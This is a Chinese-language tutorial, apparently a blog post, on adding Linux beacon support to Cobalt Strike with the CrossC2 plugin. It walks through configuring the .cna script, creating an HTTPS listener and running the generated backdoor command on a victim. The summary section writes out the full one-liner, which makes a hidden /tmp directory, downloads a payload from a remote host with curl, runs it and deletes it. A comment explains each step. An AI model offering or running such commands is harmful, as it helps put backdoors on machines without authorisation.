1.下載CrossC2

cs預設是不支援上線linux主機的 , 但是可以通過安裝CrossC2外掛實現

因為一些原因，目前強制只支援HTTPS beacon。

下載地址 : https://github.com/gloxec/CrossC2/releases/tag/v3.0.2

然後解壓zip壓縮包 , 這裡我放到cs安裝目錄的script目錄下 , 推薦這個目錄 , 這個目錄就是放一些cs指令碼的

2.安裝外掛

首先編輯cna檔案

vim CrossC2-GithubBot-2021-11-02.cna 

# 修改CrossC2.cna指令碼中CC2_PATH, CC2_BIN
$CC2_PATH = "/xxx/xx/xx/"; # <-------- fix
$CC2_BIN = "genCrossC2.Linux";
 

複製cs服務端目錄下的 .cobaltstrike.beacon_keys到與genCrossC2.Linu在一個目錄下

cp .cobaltstrike.beacon_keys ./script

啟動cs , 使用客戶端載入cna外掛

選擇Script Manager，新增CrossC2.cna (如果成功安裝，選單欄會多出一項 CrossC2)

3.上線測試

3.1生成後門

新建一個https的監聽

3.2生成上線命令

3.3上線

將上線命令複製到受害者上執行

上線成功

4.總結

整個流程 : 先生成一個後門linux平臺的後門檔案

然後再開啟一個web服務 , 生成一系列命令

具體命令

mkdir /tmp/.xNbKN; rm -f /tmp/.xNbKN/update; curl -A O -L http://192.168.0.117:55413/xFhmSNydFZ -o /tmp/.xNbKN/update; chmod 755 /tmp/.xNbKN/update; /tmp/.xNbKN/update; sleep 10; rm -rf /tmp/.xNbKN/update

# 建立一個目錄 , 然後刪除update , 下載木馬檔案 , 儲存成update , 給許可權 , 然後執行 , 睡10秒 , 刪除update

如果cs使用了profile檔案 , 注意 是否符合CrossC2 如果不符合 , 則不能上線 , 目前我還沒有測試